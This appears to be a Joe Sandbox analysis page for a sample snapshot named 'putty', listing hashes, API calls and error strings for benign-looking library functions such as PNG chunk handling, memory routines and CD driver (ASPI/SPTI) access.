Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ByteCharMultiWide$Exception@8Throw$ExceptionLockitLockit::_Raiselstrlenstd::_
String ID: and $ bytes.$The path table is too large, $Unable to calculate joliet path table size.$Unable to calculate path table size.
API String ID: 2362768178-3660222729
Opcode ID: e82eb9b164a275f984e912758efdcdb1155861cd93081c90672c24720f86d499
Instruction ID: d28f0e17bda02adf6190e45e0fb2e494a24d7f9d31c1be25061c0cbb75ff60b3
Opcode Fuzzy Hash: e82eb9b164a275f984e912758efdcdb1155861cd93081c90672c24720f86d499
Instruction Fuzzy Hash: 0651C7B1514340ABD725EF14DCC6FD7B3A8AF48714F008A19FA559B282D774E918CBE1

Function 00337550 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00337571

Part of subcall function 003B7968: std::exception::exception.LIBCMT ref: 003B797D
Part of subcall function 003B7968: __CxxThrowException@8.LIBCMT ref: 003B7992

_memmove.LIBCMT ref: 00337603
_memmove.LIBCMT ref: 0033762D
_memmove.LIBCMT ref: 00337667
_memmove.LIBCMT ref: 00337683
std::exception::exception.LIBCMT ref: 003376C5
__CxxThrowException@8.LIBCMT ref: 003376DA

Strings

deque<T> too long, xrefs: 0033756C

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 2976119697-309773918
Opcode ID: 7bb00c9e5287a16b79ab2c702495de514b4768af0cea800a107b60d6512b17d7
Instruction ID: 964f18f80365c7f3c071a6d20f66a89c599ba7f218c5fa214dfaa51db8fb0be5
Opcode Fuzzy Hash: 7bb00c9e5287a16b79ab2c702495de514b4768af0cea800a107b60d6512b17d7
Instruction Fuzzy Hash: 6841D9B1E001059BCB29DFA8CC816EEB7B5EF85310F19C669E915E7745E634EE01CB90

Function 0034AC70 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 125COMMON

Download Yara Rule

Strings

Not enough memory to process text chunk, xrefs: 0034AD23
Out of Memory, xrefs: 0034AD0E
Insufficient memory to process text chunk, xrefs: 0034ADF6

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID:
String ID: Insufficient memory to process text chunk$Not enough memory to process text chunk$Out of Memory
API String ID: 0-3556709679
Opcode ID: 8a5127b3656fa87afc87f6b14a168019d1260ce75141f72d2494fcf9bfce5edb
Instruction ID: 03c42e6c8a891f07c14d1e48ca0dd9eaf5dce7ff030f916adc567def40b90e65
Opcode Fuzzy Hash: 8a5127b3656fa87afc87f6b14a168019d1260ce75141f72d2494fcf9bfce5edb
Instruction Fuzzy Hash: 4841F575A40F019BD723DFB4A8807ABB7D4BF46311F04062EE95DCA640EB31B9518792

Function 003508F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 115stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,?,?,0034AA04,?,?,?), ref: 00350933
lstrlenA.KERNEL32(0034AA04,?,?,?,?,0034AA04,?,?,?), ref: 00350962
_memmove.LIBCMT ref: 003509AF
_memmove.LIBCMT ref: 003509F6

Strings

Invalid sCAL unit, xrefs: 00350914
Memory allocation failed while processing sCAL, xrefs: 003509E0
Invalid sCAL width, xrefs: 00350A26
Invalid sCAL height, xrefs: 00350A18

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memmovelstrlen
String ID: Invalid sCAL height$Invalid sCAL unit$Invalid sCAL width$Memory allocation failed while processing sCAL
API String ID: 3428047308-3374849547
Opcode ID: 70e3d49e34ce2c838435ddc163d5e03a94ddb4c25980019fa45b21abfd757dc2
Instruction ID: 35efe8520001649dc54e45c19937094be515f516dd3beb83a33192194fa81a98
Opcode Fuzzy Hash: 70e3d49e34ce2c838435ddc163d5e03a94ddb4c25980019fa45b21abfd757dc2
Instruction Fuzzy Hash: 1331D57160074A6BDB2FDF74E852FAEB798AF40301F154519EE089B222DB31ED5487A1

Function 00342360 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wnaspi32.dll), ref: 00342365
GetProcAddress.KERNEL32(00000000,GetASPI32SupportInfo), ref: 00342390
GetProcAddress.KERNEL32(?,SendASPI32Command), ref: 003423A2

Strings

wnaspi32.dll, xrefs: 00342360
SendASPI32Command, xrefs: 0034239C
GetASPI32SupportInfo, xrefs: 0034238A
[aspidriver]: unable to load aspi driver, status code 0x%.2x., xrefs: 003423C3
[aspidriver]: unable to load aspi driver, wnaspi32.dll could not be loaded., xrefs: 00342372

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetASPI32SupportInfo$SendASPI32Command$[aspidriver]: unable to load aspi driver, status code 0x%.2x.$[aspidriver]: unable to load aspi driver, wnaspi32.dll could not be loaded.$wnaspi32.dll
API String ID: 2238633743-2614527128
Opcode ID: efd20797267f8e94bba94036563a25348503e6257e1827da65555d128a64efd6
Instruction ID: 98153cb11dba711f3cbe27ed9c38a7292e20f232446123fd7995c79f6f9a3793
Opcode Fuzzy Hash: efd20797267f8e94bba94036563a25348503e6257e1827da65555d128a64efd6
Instruction Fuzzy Hash: 6EF0F67425030667DB266F3EFC094ABB3F8AF80741B450926F942E7260DEB8E5848A21

Function 003476A0 Relevance: 13.7, APIs: 9, Instructions: 171COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 003476BD
_free.LIBCMT ref: 00347710
_free.LIBCMT ref: 0034773A
_free.LIBCMT ref: 00347767
_free.LIBCMT ref: 00347796
_free.LIBCMT ref: 003477E4
_free.LIBCMT ref: 0034780E
_free.LIBCMT ref: 00347861

Part of subcall function 003B93AA: HeapFree.KERNEL32(00000000,00000000,?,003B9472,?), ref: 003B93C0
Part of subcall function 003B93AA: GetLastError.KERNEL32(?,?,003B9472,?), ref: 003B93D2

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3ac20014064ef72720f6357d3bee41485b9e207f59d4d4c8f6d64582a3066c74
Instruction ID: 82504c25071cb759eecc048a3c455f5e5049fc1724d2498bc490c140ed816921
Opcode Fuzzy Hash: 3ac20014064ef72720f6357d3bee41485b9e207f59d4d4c8f6d64582a3066c74
Instruction Fuzzy Hash: B8511475608B0197E72A8A35CC81BFB73D6BF41310F19082DD99F8A740DF26B945CB62

Function 003228D0 Relevance: 13.6, APIs: 9, Instructions: 120timefileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000020,00000000), ref: 00322913
GetFileTime.KERNEL32(00000000,?,?,?), ref: 00322944
CloseHandle.KERNEL32(00000000), ref: 00322951
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0032296B
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0032297B
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0032298B
FileTimeToSystemTime.KERNEL32(?,?), ref: 003229A1
FileTimeToSystemTime.KERNEL32(?,?), ref: 003229B5
FileTimeToSystemTime.KERNEL32(?,?), ref: 003229C9

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Time$File$LocalSystem$CloseCreateHandle
String ID:
API String ID: 4103576154-0
Opcode ID: 54768552bc5355f5894f4be7833a780fc46a8c85ad5324d58e86095bdf679e47
Instruction ID: f1f9b7fe475f31a2a8e1e497729c4d91dee4663f17affd75bbe6a25d7418b941
Opcode Fuzzy Hash: 54768552bc5355f5894f4be7833a780fc46a8c85ad5324d58e86095bdf679e47
Instruction Fuzzy Hash: EF414F72104305ABC712DB64EC41E9FB3ACABC8750F054A1EF65597194DB31E949CBA2

Function 00348C48 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 367COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00348FC1
__floor_pentium4.LIBCMT ref: 00349035

Part of subcall function 003D4560: ___libm_error_support.LIBCMT ref: 003D4615

__floor_pentium4.LIBCMT ref: 003490A9

Strings

Ignoring cHRM chunk with negative chromaticities, xrefs: 003491D4
Ignoring incorrect cHRM white(@1,@2) r(@3,@4)g(@5,@6)b(@7,@8) when sRGB is also present, xrefs: 00348EFE
internal error handling cHRM->XYZ, xrefs: 003491C7
internal error handling cHRM coefficients, xrefs: 0034914B

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: __floor_pentium4$___libm_error_support
String ID: Ignoring cHRM chunk with negative chromaticities$Ignoring incorrect cHRM white(@1,@2) r(@3,@4)g(@5,@6)b(@7,@8) when sRGB is also present$internal error handling cHRM coefficients$internal error handling cHRM->XYZ
API String ID: 190838090-1445317962
Opcode ID: 0b88628c65920b37b7fda304a50f4afc699bbbb891a09b91ac2d26ae0509978c
Instruction ID: 54b589ded8c8650142fff8d007eb6d0e3126cc3ebc6450555d5a91da1558603e
Opcode Fuzzy Hash: 0b88628c65920b37b7fda304a50f4afc699bbbb891a09b91ac2d26ae0509978c
Instruction Fuzzy Hash: BFD1B231D006158BDB269B64DC893EEB3B5EF84314F1502AAD90D6F2D1DB346E85CF81

Function 0032E590 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 211COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0032E5DD
std::_Xinvalid_argument.LIBCPMT ref: 0032E5FF
_memmove.LIBCMT ref: 0032E666
_memmove.LIBCMT ref: 0032E691
std::_Xinvalid_argument.LIBCPMT ref: 0032E782

Strings

invalid string position, xrefs: 0032E77D
string too long, xrefs: 0032E5D8, 0032E5FA

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 173a40192bf02d4b94efc211f17f6f232b0f392b879d3865dff3231b863bbc57
Instruction ID: 39f46c869819b6593936f3d4e664d2120765014118c4244ebc037ba4ff5c3a3d
Opcode Fuzzy Hash: 173a40192bf02d4b94efc211f17f6f232b0f392b879d3865dff3231b863bbc57
Instruction Fuzzy Hash: 07618170B102249BCB2ACF58E8C289DB3BAFFA5704724861DE452DB655DB30ED458B94

Function 00349566 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 176COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 003495C6
_free.LIBCMT ref: 0034960D

Part of subcall function 00350B40: lstrlenA.KERNEL32(?), ref: 00350B6D

Strings

Ignoring iCCP chunk with declared size = @1 and actual length = @2, xrefs: 003496EA
Profile size field missing from iCCP chunk, xrefs: 0034975E
Malformed iCCP chunk, xrefs: 00349615
Ignoring nonzero compression type in iCCP chunk, xrefs: 00349641

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _free$lstrlen
String ID: Ignoring iCCP chunk with declared size = @1 and actual length = @2$Ignoring nonzero compression type in iCCP chunk$Malformed iCCP chunk$Profile size field missing from iCCP chunk
API String ID: 3810555760-828639434
Opcode ID: 77674f7c5db451f6bfb9a212ebcd176d6919396a038c027d1680c1baeb91c5bd
Instruction ID: c78903d1cbca8807e16e7d37ca0a4aa1f19330cb47e26c8cb322e6a760f998c2
Opcode Fuzzy Hash: 77674f7c5db451f6bfb9a212ebcd176d6919396a038c027d1680c1baeb91c5bd
Instruction Fuzzy Hash: 905137316042454BCB2B9B6898D17FFB7E5AF81300F0501AEE95E4F242CF757E4587A1

Function 00343A60 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00343B03
_memmove.LIBCMT ref: 00343B46
DeviceIoControl.KERNEL32(?,0004D014,?,00000050,?,00000050,?,00000000), ref: 00343B97
GetLastError.KERNEL32(?,?,?,?,?), ref: 00343BB9

Strings

0, xrefs: 00343B36
[sptidriver]: unable to obtain device handle (%d, %d, %d, %s)., xrefs: 00343AC3
[sptidriver]: DeviceIoControl failed (%d; 0x%p, %d, 0x%p, %d, %d)., xrefs: 00343BC0

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ControlDeviceErrorLast_memmove_memset
String ID: 0$[sptidriver]: DeviceIoControl failed (%d; 0x%p, %d, 0x%p, %d, %d).$[sptidriver]: unable to obtain device handle (%d, %d, %d, %s).
API String ID: 1353868144-3482043859
Opcode ID: 32209340b1812e2fe7ac66defb2efbb4aa5325e5db11ec82cd47c598672a9846
Instruction ID: 673ed2c7569269a078bdd7cf20111d80fa4fc7e3348c3fae9469d9144f7fc4c1
Opcode Fuzzy Hash: 32209340b1812e2fe7ac66defb2efbb4aa5325e5db11ec82cd47c598672a9846
Instruction Fuzzy Hash: 78515D706483449FD715CF18C885AABBBE9EFC9314F44495EF9988B391D770EA04CBA2

Function 003427B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132synchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00342835
_memmove.LIBCMT ref: 00342873
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003428A5
ResetEvent.KERNEL32(00000000), ref: 003428AE
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003428CA
CloseHandle.KERNEL32(00000000), ref: 003428D1

Part of subcall function 00342360: LoadLibraryW.KERNEL32(wnaspi32.dll), ref: 00342365

Strings

H, xrefs: 00342893

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Event$CloseCreateHandleLibraryLoadObjectResetSingleWait_memmove_memset
String ID: H
API String ID: 2996368519-2852464175
Opcode ID: a089fc505ff54cf526162052df5ba58e048e116dab1f830ae22ff6198bf2159f
Instruction ID: 7d2c2c4e0b02869fb73b8630d6b12a96db4730c572d90c82c5f94dad8764d0c6
Opcode Fuzzy Hash: a089fc505ff54cf526162052df5ba58e048e116dab1f830ae22ff6198bf2159f
Instruction Fuzzy Hash: 21518D719043899FDF12CFA9D884BEEBBF4BF49310F14415AE858AB382C774A914CB61

Function 0034C428 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0034C461
_free.LIBCMT ref: 0034C486
_malloc.LIBCMT ref: 0034C4B7

Part of subcall function 003B9B62: __FF_MSGBANNER.LIBCMT ref: 003B9B7B
Part of subcall function 003B9B62: __NMSG_WRITE.LIBCMT ref: 003B9B82
Part of subcall function 003B9B62: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003BE372,00000000,00000001,00000000,?,003CA150,00000018,00402B88,0000000C,003CA1E0), ref: 003B9BA7

_malloc.LIBCMT ref: 0034C4F2
_memset.LIBCMT ref: 0034C557

Strings

Out of Memory, xrefs: 0034C4C8, 0034C503
Row has too many bytes to allocate in memory, xrefs: 0034C541

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
